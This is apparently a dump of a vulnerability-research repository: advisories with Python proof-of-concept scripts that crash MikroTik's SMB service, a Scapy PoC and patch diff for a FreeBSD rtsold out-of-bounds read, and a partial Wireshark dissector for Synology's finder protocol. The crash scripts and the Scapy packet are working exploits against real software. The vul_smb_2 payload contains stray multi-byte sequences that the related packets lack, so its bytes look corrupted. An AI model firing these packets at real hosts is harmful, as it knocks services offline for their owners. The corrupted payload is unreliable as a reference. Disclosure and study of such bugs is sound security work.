3\xce4\x17\xeb\xc5\x0c{p\x00\x00\x00\x04\x00\xe2\x80\x88\x00\x00\x02\x02\x10\x02\x00\x03\x02\x03\x11\x03\x00\x00\x0e\xfe\xff\x01\x00&\x00\x00\x00\x00\x00\x01\x00 \x00\x01\x00\xd4\xfa\xbc^\xc5g\xf3\xa0\x81\xb7\x8a9\xeaP\xe6\xa0(\x13\xc7\xa9\xa9@\xf4\x1b\x0f\xc3\xe3\x98\x89\xc54\x1e\xb4134h\xea\x00\x00\x02\x00\x06\x00\x00\x00\x00\x00\x02\x00\x02\x00\x01\x00\x00\x00\x03\x00\x0e\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x01\x00\x00\x00\x05\x00\x1e\x00\x00\x00\x00\x001\x00340282366920938463463374607431778211447\x002\x00.\x001\x006\x008\x00.\x002\x000\x000\x00.\x001\x005\x002\x00' 8 | 9 | send_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 10 | send_socket.connect((host, port)) 11 | send_socket.send(payload) 12 | 13 | 14 | if __name__ == "__main__": 15 | if len(sys.argv) != 3: 16 | print "Usage: python poc.py " 17 | sys.exit() 18 | 19 | host = sys.argv[1] 20 | port = int(sys.argv[2]) 21 | vul_smb_1(host, port) 22 | -------------------------------------------------------------------------------- /advisory/MikroTik/vul_smb_2/README.md: -------------------------------------------------------------------------------- 1 | ### vul_smb_2 2 | 3 | #### Description 4 | 5 | The `smb` process suffers from a memory corruption vulnerability. By sending a crafted packet, an unauthenticated remote user can crash the `smb` process due to invalid memory access. 6 | 7 | > In default, the `smb` service is disabled. 8 | 9 | #### Reproduce 10 | 11 | ```shell 12 | $ python poc.py 13 | ``` 14 | #### Affected Version 15 | 16 | This vulnerability was found in stable `6.44.2`, and was fixed since stable `6.44.3`. 17 | 18 | -------------------------------------------------------------------------------- /advisory/MikroTik/vul_smb_2/poc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import sys 3 | import socket 4 | 5 | 6 | def vul_smb_2(host, port=445): 7 | payload = '\x00\x00\x00\xee\xfeSMB@\x00\x01\x00\x00\x00\x00\x00\x00\x00!\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$\x00\x05\x00\x01\x00\x00\x00\x7f\x00\x00\x00\xd1\xc5\x81\xc2\xec\x88\xea\x11\x83\xce4\x17\xeb\xc5\x0c{p\x00\x00\x00\x04\x00\x00\x00\x02\x02\x10\xf3\xa0\x80\xa5\x02\x00\x03\x02\x03\x11\x03\x00\x00\x01\x00\xf3\xa0\x81\x8b&\x00\x00\x00\x00\x00\x01\x00 \x00\x01\x00\xd4\xfa\xbc\xe0\xb9\x83^\xc5g\x8a9\xeaP\xe6\xa0(\x13\xc7\xa9\xa9@\xf40\x0f\xc3\xe3\x98\x89\xc54\x1e\xb46h\xea\x00\x00\x02\x00\x06\x00\x00\x00\x00\x00\x02\x00\x02\x00\x01\x00\x00\x00\x03\x00\x0e\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x01\xe2\x02\x00\x01\x00\x00\x00\x03\x00\x0e\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x01\xe2\x80\x81\x00\x00\x00\xf3\xa0\x81\xa4\x05\x00\x1e\x00\x00\x00\x00\x001\x009\x002\x00.\x001\x006\x008\x00.\x002\x000\x000\x00.\x0032770\x005\x0032767\x00' 8 | 9 | send_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 10 | send_socket.connect((host, port)) 11 | send_socket.send(payload) 12 | 13 | 14 | if __name__ == "__main__": 15 | if len(sys.argv) != 3: 16 | print "Usage: python poc.py " 17 | sys.exit() 18 | 19 | host = sys.argv[1] 20 | port = int(sys.argv[2]) 21 | vul_smb_2(host, port) 22 | -------------------------------------------------------------------------------- /advisory/MikroTik/vul_smb_3/README.md: -------------------------------------------------------------------------------- 1 | ### vul_smb_3 2 | 3 | #### Description 4 | 5 | The `smb` process suffers from a memory corruption vulnerability. By sending a crafted packet, an unauthenticated remote user can crash the `smb` process due to invalid memory access. 6 | 7 | > In default, the `smb` service is disabled. 8 | 9 | Against stable `6.46.5`, the poc resulted in the following crash captured by `gdb`. 10 | 11 | ```shell 12 | (gdb) c 13 | Continuing. 14 | 15 | Program received signal SIGSEGV, Segmentation fault. 16 | => 0x806bffd: mov edx,DWORD PTR [eax] 17 | 0x806bfff: push ebx 18 | 0x806c000: push DWORD PTR [ebp-0x12c] 19 | 0x806c006: push DWORD PTR [ebp-0x120] 20 | 0x0806bffd in ?? () 21 | (gdb) i r 22 | eax 0x0 0 23 | ecx 0x77727f00 2003992320 24 | edx 0x1 1 25 | ebx 0x7ffca9e0 2147264992 26 | esp 0x7ffca960 0x7ffca960 27 | ebp 0x7ffcaaa8 0x7ffcaaa8 28 | esi 0x7ffca9f8 2147265016 29 | edi 0x0 0 30 | eip 0x806bffd 0x806bffd 31 | eflags 0x10206 [ PF IF RF ] 32 | cs 0x73 115 33 | ss 0x7b 123 34 | ds 0x7b 123 35 | es 0x7b 123 36 | fs 0x0 0 37 | gs 0x33 51 38 | (gdb) info inferiors 39 | Num Description Executable 40 | * 1 process 181 target:/nova/bin/smb 41 | ``` 42 | 43 | And the crash dump in `/rw/logs/backtrace.log` was: 44 | 45 | ```shell 46 | # cat /rw/logs/backtrace.log 47 | 2020.06.18-19:33:09.94@0: 48 | 2020.06.18-19:33:09.94@0: 49 | 2020.06.18-19:33:09.94@0: /nova/bin/smb 50 | 2020.06.18-19:33:09.94@0: --- signal=11 -------------------------------------------- 51 | 2020.06.18-19:33:09.94@0: 52 | 2020.06.18-19:33:09.94@0: eip=0x0806bffd eflags=0x00010206 53 | 2020.06.18-19:33:09.94@0: edi=0x00000000 esi=0x7ffca9f8 ebp=0x7ffcaaa8 esp=0x7ffca960 54 | 2020.06.18-19:33:09.94@0: eax=0x00000000 ebx=0x7ffca9e0 ecx=0x77727f00 edx=0x00000001 55 | 2020.06.18-19:33:09.94@0: 56 | 2020.06.18-19:33:09.94@0: maps: 57 | 2020.06.18-19:33:09.94@0: 08048000-08071000 r-xp 00000000 00:0c 1053 /nova/bin/smb 58 | 2020.06.18-19:33:09.94@0: 776f0000-77725000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so 59 | 2020.06.18-19:33:09.94@0: 77729000-77743000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1 60 | 2020.06.18-19:33:09.94@0: 77744000-77753000 r-xp 00000000 00:0c 944 /lib/libuc++.so 61 | 2020.06.18-19:33:09.94@0: 77754000-77771000 r-xp 00000000 00:0c 947 /lib/libucrypto.so 62 | 2020.06.18-19:33:09.94@0: 77772000-777be000 r-xp 00000000 00:0c 946 /lib/libumsg.so 63 | 2020.06.18-19:33:09.94@0: 777c1000-777c9000 r-xp 00000000 00:0c 950 /lib/libubox.so 64 | 2020.06.18-19:33:09.94@0: 777cd000-777d4000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 65 | 2020.06.18-19:33:09.94@0: 66 | 2020.06.18-19:33:09.94@0: stack: 0x7ffcb000 - 0x7ffca960 67 | 2020.06.18-19:33:09.94@0: e0 a9 fc 7f 88 aa fc 7f 0e 73 07 08 a0 73 07 08 01 00 00 00 0e 73 07 08 91 00 00 00 00 00 00 00 68 | 2020.06.18-19:33:09.94@0: 26 eb 71 77 00 60 72 77 00 00 00 00 21 ec 71 77 4e 54 4c 4d 53 53 50 00 d8 a9 fc 7f 4d 98 71 77 69 | 2020.06.18-19:33:09.94@0: 70 | 2020.06.18-19:33:09.94@0: code: 0x806bffd 71 | 2020.06.18-19:33:09.94@0: 8b 10 53 ff b5 d4 fe ff ff ff b5 e0 fe ff ff 50 72 | ``` 73 | 74 | #### Reproduce 75 | 76 | ```shell 77 | $ python poc.py 78 | ``` 79 | #### Affected Version 80 | 81 | This vulnerability was initially found in stable `6.44.3`, and was fixed in stable `6.47`. 82 | 83 | #### Timeline 84 | 85 | + 2020/05/12 - report the vulnerability to the vendor 86 | + 2020/05/13 - vendor confirms the vulnerability and says that it has been fixed in the latest beta (unreleased) 87 | + 2020/06/02 - vendor fix it in stable `6.47` -------------------------------------------------------------------------------- /advisory/MikroTik/vul_smb_3/poc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import sys 3 | import socket 4 | 5 | 6 | def vul_smb_3(host, port=445): 7 | send_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 8 | send_socket.connect((host, port)) 9 | 10 | packet_negotiate_request = "\x00\x00\x00\xee\xfe\x53\x4d\x42\x40\x00\x01\x00\x00\x00\x00\x00" \ 11 | "\x00\x00\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ 12 | "\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ 13 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ 14 | "\x00\x00\x00\x00\x24\x00\x05\x00\x01\x00\x00\x00\x7f\x00\x00\x00" \ 15 | "\xd1\xc5\x81\xc2\xec\x88\xea\x11\x83\xce\x34\x17\xeb\xc5\x0c\x7b" \ 16 | "\x70\x00\x00\x00\x04\x00\x00\x00\x02\x02\x10\x02\x00\x03\x02\x03" \ 17 | "\x11\x03\x00\x00\x01\x00\x26\x00\x00\x00\x00\x00\x01\x00\x20\x00" \ 18 | "\x01\x00\xd4\xfa\xbc\x5e\xc5\x67\x8a\x39\xea\x50\xe6\xa0\x28\x13" \ 19 | "\xc7\xa9\xa9\x40\xf4\x30\x0f\xc3\xe3\x98\x89\xc5\x34\x1e\xb4\x36" \ 20 | "\x68\xea\x00\x00\x02\x00\x06\x00\x00\x00\x00\x00\x02\x00\x02\x00" \ 21 | "\x01\x00\x00\x00\x03\x00\x0e\x00\x00\x00\x00\x00\x03\x00\x00\x00" \ 22 | "\x00\x00\x00\x00\x02\x00\x03\x00\x01\x00\x00\x00\x05\x00\x1e\x00" \ 23 | "\x00\x00\x00\x00\x31\x00\x39\x00\x32\x00\x2e\x00\x31\x00\x36\x00" \ 24 | "\x38\x00\x2e\x00\x32\x00\x30\x00\x30\x00\x2e\x00\x31\x00\x35\x00" \ 25 | "\x32\x00" 26 | 27 | send_socket.send(packet_negotiate_request) 28 | send_socket.recv(1024) 29 | 30 | packet_session_setup_request = "\x00\x00\x00\xa2\xfe\x53\x4d\x42\x40\x00\x01\x00\x00\x00" \ 31 | "\x00\x00\x01\x00\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00" \ 32 | "\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00\x00\x00\x00\x00" \ 33 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ 34 | "\x00\x00\x00\x00\x00\x00\x19\x00\x00\x01\x01\x00\x00\x00\x00\x00" \ 35 | "\x00\x00\x58\x00\x4a\x00\x12\x00\x00\x00\x01\x00\x00\x00\x60\x48" \ 36 | "\x06\x06\x2b\x06\x01\x05\x05\x02\xa1\x3e\x2d\x33\x35\x35\x31\x37" \ 37 | "\x33\x31\x33\x38\x38\x39\x38\x38\x36\x32\x31\x34\x39\x30\x35\x35" \ 38 | "\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x32\x35\x36" \ 39 | "\x32\x31\x34\x39\x30\x35\x35\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06" \ 40 | "\x01\x04\x01\x82\x39\x32\x32\x33\x33\x37\x32\x31\x33\x36\x38\x35" \ 41 | "\x34\x37\x37\x35\x38\x30\x39\x02\x02\x0a\xa2\x2a\x33\x33\x37\x32" \ 42 | "\x31\x33\x36\x38\x35\x34\x37\x37\x35\x38\x30\x39\x02\x02\x0a\xa2" \ 43 | "\x2a\x33\x33\x37\x32\x31\x33\x36\x38\x35\x34\x37\x37\x35\x38\x30" \ 44 | "\x39\x02\x02\x0a\xa2\x2a\x33\x33\x37\x32\x31\x33\x36\x38\x35\x34" \ 45 | "\x37\x37\x35\x38\x30\x39\x02\x02\x0a\xa2\x2a\x33\x33\x37\x32\x31" \ 46 | "\x33\x36\x38\x35\x34\x37\x37\x35\x38\x30\x39\x02\x02\x0a\xa2\x2a" \ 47 | "\x33\x33\x37\x32\x31\x33\x36\x38\x35\x34\x37\x37\x35\x38\x30\x39" \ 48 | "\x02\x02\x0a\xa2\x2a\x33\x33\x37\x32\x31\x33\x36\x38\x35\x34\x37" \ 49 | "\x37\x35\x38\x30\x39\x02\x02\x0a\xa2\x2a\x37\x33\x31\x33\x38\x38" \ 50 | "\x39\x38\x38\x36\x32\x31\x34\x39\x30\x35\x35\x3c\xa0\x0e\x30\x0c" \ 51 | "\x06\x0a\x2b\x06\x01\x04\x01\x82\x39\x32\x32\x33\x33\x37\x32\x30" \ 52 | "\x33\x36\x38\x35\x34\x37\x37\x35\x38\x30\x3a\x02\x02\x0b\xa2\x2a" \ 53 | "\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x97\x82" \ 54 | "\x08\xe2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ 55 | "\x00\x00\x0a\x00\xba\x48\x00\x00\x00\x0f" 56 | 57 | send_socket.send(packet_session_setup_request) 58 | 59 | 60 | if __name__ == "__main__": 61 | if len(sys.argv) != 3: 62 | print "Usage: python poc.py " 63 | sys.exit() 64 | 65 | host = sys.argv[1] 66 | port = int(sys.argv[2]) 67 | vul_smb_3(host, port) 68 | -------------------------------------------------------------------------------- /advisory/Other/freebsd_rtsold_out_of_bounds_read/README.md: -------------------------------------------------------------------------------- 1 | ## FreeBSD rtsold Out of Bounds Read Vulnerability 2 | 3 | On January 28th, 2021, Quarkslab published a blog "[Bad Neighbor on FreeBSD: IPv6 Router Advertisement Vulnerabilities in rtsold (CVE-2020-25577)](https://blog.quarkslab.com/bad-neighbor-on-freebsd-ipv6-router-advertisement-vulnerabilities-in-rtsold-cve-2020-25577.html)", which detailed about 4 vulnerabilities found in the IPv6 stack of FreeBSD, more specifically in `rtsold(8)`, the router solicitation daemon. After reading it, I took a look at `rtsold` , and found another out-of-bounds read vulnerability. 4 | 5 | ### Description 6 | 7 | The function `rtsol_input()` in `usr.sbin/rtsold/rtsol.c` loops through the options included in a `Router Advertisement` message. One of the supported option types is called `Recursive DNS Server`, or `RDNSS` for short. The `RDNSS` option is composed of 4 fixed fields (`Type`, `Length`, `Reserved` and `Lifetime`), followed by a variable number of IPv6 addresses of recursive DNS servers. In general, the `Length` field is an odd multiple of 8. 8 | 9 | When dealing with a `RDNSS` option, the routine will go to line 364. At line 376, the `addr` pointer is set to point past the 4 fixed fields of the `RNDSS` option, that is, it points to the beginning of the variable number of IPv6 addresses included in the `RDNSS` option. Then, at line 377, it loops over the IPv6 addresses in the `RDNSS` option, reading a 16-byte IPv6 address from the option data at each iteration, as long as the `addr` pointer doesn't reach the end of the option, which is calculated by using the `RA_OPT_NEXT_HDR` macro. 10 | 11 | However, if we craft a `ND_OPT_RDNSS` option with `Length=4` (even multiple of 8), when the routine go to line 378 again, it will read 16-byte address from the option data, but there is only 8-byte available. As a result, out-of-bounds read will occur. 12 | 13 | ```c 14 | 157 void 15 | 158 rtsol_input(int sock) 16 | 159 { 17 | [...] 18 | 339 19 | 340 #define RA_OPT_NEXT_HDR(x) (struct nd_opt_hdr *)((char *)(x) + \ 20 | 341 (((struct nd_opt_hdr *)(x))->nd_opt_len * 8)) 21 | 342 /* Process RA options. */ 22 | 343 warnmsg(LOG_DEBUG, __func__, "Processing RA"); 23 | 344 raoptp = (char *)icp + sizeof(struct nd_router_advert); 24 | 345 while (raoptp < (char *)icp + msglen) { 25 | 346 ndo = (struct nd_opt_hdr *)raoptp; 26 | [...] 27 | 352 28 | 353 if (ndo->nd_opt_len == 0) { 29 | 354 warnmsg(LOG_INFO, __func__, "invalid option length 0."); 30 | 355 break; 31 | 356 } 32 | 357 if ((char *)RA_OPT_NEXT_HDR(raoptp) > (char *)icp + msglen) { 33 | 358 warnmsg(LOG_INFO, __func__, "option length overflow."); 34 | 359 break; 35 | 360 } 36 | 361 37 | 362 switch (ndo->nd_opt_type) { 38 | 363 case ND_OPT_RDNSS: 39 | 364 rdnss = (struct nd_opt_rdnss *)raoptp; 40 | 365 41 | 366 /* Optlen sanity check (Section 5.3.1 in RFC 6106) */ 42 | 367 if (rdnss->nd_opt_rdnss_len < 3) { 43 | 368 warnmsg(LOG_INFO, __func__, 44 | 369 "too short RDNSS option" 45 | 370 "in RA from %s was ignored.", 46 | 371 inet_ntop(AF_INET6, &from.sin6_addr, 47 | 372 ntopbuf, sizeof(ntopbuf))); 48 | 373 break; 49 | 374 } 50 | 375 51 | 376 addr = (struct in6_addr *)(void *)(raoptp + sizeof(*rdnss)); 52 | 377 while ((char *)addr < (char *)RA_OPT_NEXT_HDR(raoptp)) { 53 | 378 if (inet_ntop(AF_INET6, addr, ntopbuf, 54 | 379 sizeof(ntopbuf)) == NULL) { 55 | 380 warnmsg(LOG_INFO, __func__, 56 | 381 "an invalid address in RDNSS option" 57 | 382 " in RA from %s was ignored.", 58 | 383 inet_ntop(AF_INET6, &from.sin6_addr, 59 | 384 ntopbuf, sizeof(ntopbuf))); 60 | 385 addr++; 61 | 386 continue; 62 | 387 } 63 | [...] 64 | 436 addr++; 65 | 437 } 66 | ``` 67 | 68 | ### Proof of Concept 69 | 70 | The following code, based on `Scapy`, provides a proof-of-concept for the bug described above. It was tested against `FreeBSD 12.2-RELEASE-p3`. 71 | 72 | ```python 73 | import string 74 | from scapy.layers.inet6 import IPv6, ICMPv6ND_RA, ICMPv6NDOptDNSSL, ByteField, ShortField, IntField, StrField 75 | from scapy.all import send, Packet 76 | 77 | class MyICMPv6NDOptRDNSS(Packet): 78 | name = "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option" 79 | fields_desc = [ByteField("type", 25), 80 | ByteField("len", 4), 81 | ShortField("res", None), 82 | IntField("lifetime", 0xffffffff), 83 | StrField("dns", "AAAAAAAAAAAAAAAABBBBBBBB") 84 | ] 85 | 86 | def rdnss_oob_read(target_addr): 87 | def build_domain_name(name_len): 88 | CHUNKS = name_len // 0x3f 89 | subdomains = [] 90 | for i in range(CHUNKS): 91 | subdomains.append(string.ascii_lowercase[i] * 0x3f) 92 | domain = '.'.join(subdomains) 93 | print('final len(domain) :{}'.format(len(domain))) 94 | return domain 95 | 96 | ip = IPv6(dst = target_addr, hlim = 255) 97 | ra = ICMPv6ND_RA() 98 | dnssl1 = ICMPv6NDOptDNSSL(lifetime=1, searchlist=[build_domain_name(1024)]) 99 | dnssl2 = ICMPv6NDOptDNSSL(lifetime=1, searchlist=[build_domain_name(375)]) 100 | dnssl3 = ICMPv6NDOptDNSSL(lifetime=1, searchlist=['1'*22]) 101 | 102 | rdnss = MyICMPv6NDOptRDNSS(lifetime=1) 103 | 104 | pkt = ip/ra/dnssl1/dnssl2/dnssl3/rdnss 105 | 106 | print("total pakcet len: %d" % (len(pkt))) 107 | print("total ipv6 len: %d" % (len(ra/dnssl1/dnssl2/dnssl3/rdnss))) 108 | send(pkt) 109 | 110 | def main(): 111 | target_addr = "fe80::20c:29ff:fed1:1999" 112 | rdnss_oob_read(target_addr) 113 | 114 | if __name__ == '__main__': 115 | main() 116 | ``` 117 | 118 | ### Patch 119 | 120 | It has been fixed in this [commit](https://cgit.freebsd.org/src/commit/?id=1af332a7d8f86b6fcc1f0f575fe5b06021b54f4c) as follows. 121 | 122 | ```diff 123 | diff --git a/usr.sbin/rtsold/rtsol.c b/usr.sbin/rtsold/rtsol.c 124 | index 30027fc65ac9..76756bfd8393 100644 125 | --- a/usr.sbin/rtsold/rtsol.c 126 | +++ b/usr.sbin/rtsold/rtsol.c 127 | @@ -363,13 +363,19 @@ rtsol_input(int sock) 128 | case ND_OPT_RDNSS: 129 | rdnss = (struct nd_opt_rdnss *)raoptp; 130 | 131 | - /* Optlen sanity check (Section 5.3.1 in RFC 6106) */ 132 | - if (rdnss->nd_opt_rdnss_len < 3) { 133 | + /* 134 | + * The option header is 8 bytes long and each address 135 | + * occupies 16 bytes, so the option length must be 136 | + * greater than or equal to 24 bytes and an odd multiple 137 | + * of 8 bytes. See section 5.1 in RFC 6106. 138 | + */ 139 | + if (rdnss->nd_opt_rdnss_len < 3 || 140 | + rdnss->nd_opt_rdnss_len % 2 == 0) { 141 | warnmsg(LOG_INFO, __func__, 142 | - "too short RDNSS option" 143 | - "in RA from %s was ignored.", 144 | - inet_ntop(AF_INET6, &from.sin6_addr, 145 | - ntopbuf, sizeof(ntopbuf))); 146 | + "too short RDNSS option in RA from %s " 147 | + "was ignored.", 148 | + inet_ntop(AF_INET6, &from.sin6_addr, ntopbuf, 149 | + sizeof(ntopbuf))); 150 | break; 151 | } 152 | ``` 153 | 154 | ### Reference 155 | 156 | + [Bad Neighbor on FreeBSD: IPv6 Router Advertisement Vulnerabilities in rtsold (CVE-2020-25577)](https://blog.quarkslab.com/bad-neighbor-on-freebsd-ipv6-router-advertisement-vulnerabilities-in-rtsold-cve-2020-25577.html) 157 | + [Multiple vulnerabilities in rtsold](https://www.freebsd.org/security/advisories/FreeBSD-SA-20:32.rtsold.asc) 158 | + [Neighbor Discovery Protocol](https://en.wikipedia.org/wiki/Neighbor_Discovery_Protocol) 159 | + [rtsold: Fix validation of RDNSS options](https://cgit.freebsd.org/src/commit/?id=1af332a7d8f86b6fcc1f0f575fe5b06021b54f4c) -------------------------------------------------------------------------------- /advisory/Other/freebsd_rtsold_out_of_bounds_read/poc.py: -------------------------------------------------------------------------------- 1 | import string 2 | from scapy.layers.inet6 import IPv6, ICMPv6ND_RA, ICMPv6NDOptDNSSL, ByteField, ShortField, IntField, StrField 3 | from scapy.all import send, Packet 4 | 5 | class MyICMPv6NDOptRDNSS(Packet): 6 | name = "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option" 7 | fields_desc = [ByteField("type", 25), 8 | ByteField("len", 4), 9 | ShortField("res", None), 10 | IntField("lifetime", 0xffffffff), 11 | StrField("dns", "AAAAAAAAAAAAAAAABBBBBBBB") 12 | ] 13 | 14 | def rdnss_oob_read(target_addr): 15 | def build_domain_name(name_len): 16 | CHUNKS = name_len // 0x3f 17 | subdomains = [] 18 | for i in range(CHUNKS): 19 | subdomains.append(string.ascii_lowercase[i] * 0x3f) 20 | domain = '.'.join(subdomains) 21 | print('final len(domain) :{}'.format(len(domain))) 22 | return domain 23 | 24 | ip = IPv6(dst = target_addr, hlim = 255) 25 | ra = ICMPv6ND_RA() 26 | dnssl1 = ICMPv6NDOptDNSSL(lifetime=1, searchlist=[build_domain_name(1024)]) 27 | dnssl2 = ICMPv6NDOptDNSSL(lifetime=1, searchlist=[build_domain_name(375)]) 28 | dnssl3 = ICMPv6NDOptDNSSL(lifetime=1, searchlist=['1'*22]) 29 | 30 | rdnss = MyICMPv6NDOptRDNSS(lifetime=1) 31 | 32 | pkt = ip/ra/dnssl1/dnssl2/dnssl3/rdnss 33 | 34 | print("total pakcet len: %d" % (len(pkt))) 35 | print("total ipv6 len: %d" % (len(ra/dnssl1/dnssl2/dnssl3/rdnss))) 36 | send(pkt) 37 | 38 | def main(): 39 | target_addr = "fe80::20c:29ff:fed1:1999" 40 | rdnss_oob_read(target_addr) 41 | 42 | if __name__ == '__main__': 43 | main() 44 | -------------------------------------------------------------------------------- /scripts/Synology/syno_finder/README.md: -------------------------------------------------------------------------------- 1 | ### Wireshark Plugins 2 | 3 | #### syno_finder 4 | 5 | A plugin to disassemble the Synology finder protocol (`9999/udp`). 6 | 7 | -------------------------------------------------------------------------------- /scripts/Synology/syno_finder/images/syno_finder_sample.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cq674350529/pocs_slides/a1049d4dcf3de34e4aff173d85a5520bd94e50f4/scripts/Synology/syno_finder/images/syno_finder_sample.png -------------------------------------------------------------------------------- /scripts/Synology/syno_finder/syno_finder.lua: -------------------------------------------------------------------------------- 1 | -- @brief Synology Finder Protocol(9999/udp) Dissector Plugin 2 | -- @author cq674350529 3 | 4 | -- reference: 5 | -- 1) https://mika-s.github.io/wireshark/lua/dissector/2017/11/04/creating-a-wireshark-dissector-in-lua-1.html 6 | -- 2) https://github.com/wireshark/wireshark/blob/master/epan/dissectors/packet-cdp.c 7 | -- 3) https://www.wireshark.org/docs/wsdg_html_chunked/wslua_dissector_example.html 8 | -- 4) https://www.wireshark.org/docs/wsdg_html_chunked/wsluarm_modules.html 9 | 10 | local synoFinderProtocol = Proto("SynoFinder", "Synology Finder Protocol") 11 | local protoName = "syno_finder" 12 | 13 | 14 | local magic = ProtoField.bytes(protoName .. ".magic", "Magic", base.SPACE) 15 | 16 | -- subtree header 17 | local tlv = ProtoField.bytes(protoName .. "tlv", "TLV") -- only used to group type, length and value 18 | 19 | local length = ProtoField.uint8(protoName .. ".length", "Length") 20 | local value = ProtoField.bytes(protoName .. ".value", "Value") 21 | 22 | -- specific value field 23 | local packetType = ProtoField.uint32(protoName .. ".packet_type", "Packet Type", base.HEX) 24 | local serverName = ProtoField.string(protoName .. ".server_name", "Server Name") 25 | local ipAddress = ProtoField.ipv4(protoName .. ".ip_address", "IP") 26 | local ipMask = ProtoField.ipv4(protoName .. ".subnet_mask", "Subnet Mask") 27 | local dns = ProtoField.ipv4(protoName .. ".dns", "DNS") 28 | local macAddress = ProtoField.string(protoName .. ".mac_address", "Mac Address") 29 | local ipGateway = ProtoField.ipv4(protoName .. ".gateway", "Gateway") 30 | local packetSubtype = ProtoField.uint32(protoName .. ".packet_subtype", "Packet Subtype", base.HEX) 31 | local password = ProtoField.string(protoName .. ".password", "Password") 32 | local buildNum = ProtoField.uint32(protoName .. ".build_num", "Build Num") 33 | local unique = ProtoField.string(protoName .. ".unique", "Unique") 34 | local supportRaid = ProtoField.uint32(protoName .. ".support_raid", "Support Raid") 35 | local port = ProtoField.uint32(protoName .. ".port", "Port") 36 | local sslPort = ProtoField.uint32(protoName .. ".ssl_port", "Ssl Port") 37 | local username = ProtoField.string(protoName .. ".username", "Username") 38 | local shareFolder = ProtoField.string(protoName .. ".share_folder", "Share Folder") 39 | local productVersion = ProtoField.string(protoName .. ".product_version", "Product Version") 40 | local model = ProtoField.string(protoName .. ".model", "Model") 41 | local memtestErrorCode = ProtoField.uint32(protoName .. ".memtest_error_code", "Memtest Error Code", base.HEX) 42 | local smallFixNum = ProtoField.uint32(protoName .. ".small_fix_num", "Small Fix Num") 43 | local serialNum = ProtoField.string(protoName .. ".serial_num", "Serial Num") 44 | local osName = ProtoField.string(protoName .. ".os_name", "Os Name") 45 | local supportOnsiteTool = ProtoField.string(protoName .. ".support_onsite_tool", "Support Onsite Tool") 46 | local publicKey = ProtoField.string(protoName .. ".public_key", "Public Key") 47 | local randomBytes = ProtoField.uint32(protoName .. ".random_bytes", "Random Bytes", base.HEX) 48 | 49 | local value8 = ProtoField.uint8(protoName .. ".value", "Value", base.HEX) 50 | local value16 = ProtoField.uint16(protoName .. ".value", "Value", base.HEX) 51 | local value32 = ProtoField.uint32(protoName .. ".value", "Value", base.HEX) 52 | 53 | local typeFields = { 54 | [0x1] = packetType, 55 | [0x11] = serverName, 56 | [0x12] = ipAddress, 57 | [0x13] = ipMask, 58 | [0x14] = dns, 59 | [0x15] = dns, 60 | [0x19] = macAddress, 61 | [0x1e] = ipGateway, 62 | [0x20] = packetSubtype, 63 | [0x21] = serverName, 64 | [0x29] = macAddress, 65 | [0x2a] = password, 66 | [0x49] = buildNum, 67 | [0x4a] = username, 68 | [0x4b] = shareFolder, 69 | [0x70] = unique, 70 | [0x71] = supportRaid, 71 | [0x73] = serialNum, 72 | [0x75] = port, 73 | [0x76] = sslPort, 74 | [0x77] = productVersion, 75 | [0x78] = model, 76 | [0x79] = memtestErrorCode, 77 | [0x7c] = macAddress, 78 | [0x90] = smallFixNum, 79 | [0xc0] = serialNum, 80 | [0xc1] = osName, 81 | [0xc3] = supportOnsiteTool, 82 | [0xc4] = publicKey, 83 | [0xc5] = randomBytes 84 | } 85 | 86 | -- reference: https://stackoverflow.com/questions/52012229/how-do-you-access-name-of-a-protofield-after-declaration 87 | function getFieldName(field) 88 | local fieldString = tostring(field) 89 | local i, j = string.find(fieldString, ": .* " .. protoName) 90 | return string.sub(fieldString, i + 2, j - (1 + string.len(protoName))) 91 | end 92 | 93 | -- generate typeNames 94 | local typeNames = {} 95 | for tlvType, itemField in pairs(typeFields) do 96 | typeNames[tlvType] = getFieldName(itemField) 97 | end 98 | 99 | local type = ProtoField.uint8(protoName .. ".type", "Type", base.HEX, typeNames) 100 | 101 | 102 | -- display in subtree header 103 | -- reference: 104 | -- 1) https://gist.github.com/FreeBirdLjj/6303864 105 | -- 2) https://blog.csdn.net/humanxing/article/details/42318213 106 | function format_uint_le(value) 107 | return value:le_uint() 108 | end 109 | 110 | function format_uint_hex(value) 111 | return string.format("%#x", value:le_uint()) 112 | end 113 | 114 | function format_uint_bool(value) 115 | local bool_value = "False" 116 | if value:le_uint() ~= 0 then 117 | bool_value = "True" 118 | end 119 | return bool_value 120 | end 121 | 122 | function format_string(value) 123 | return value:string() 124 | end 125 | 126 | function format_ipv4(value) 127 | return value:ipv4() 128 | end 129 | 130 | local typeFormats = { 131 | [0x1] = 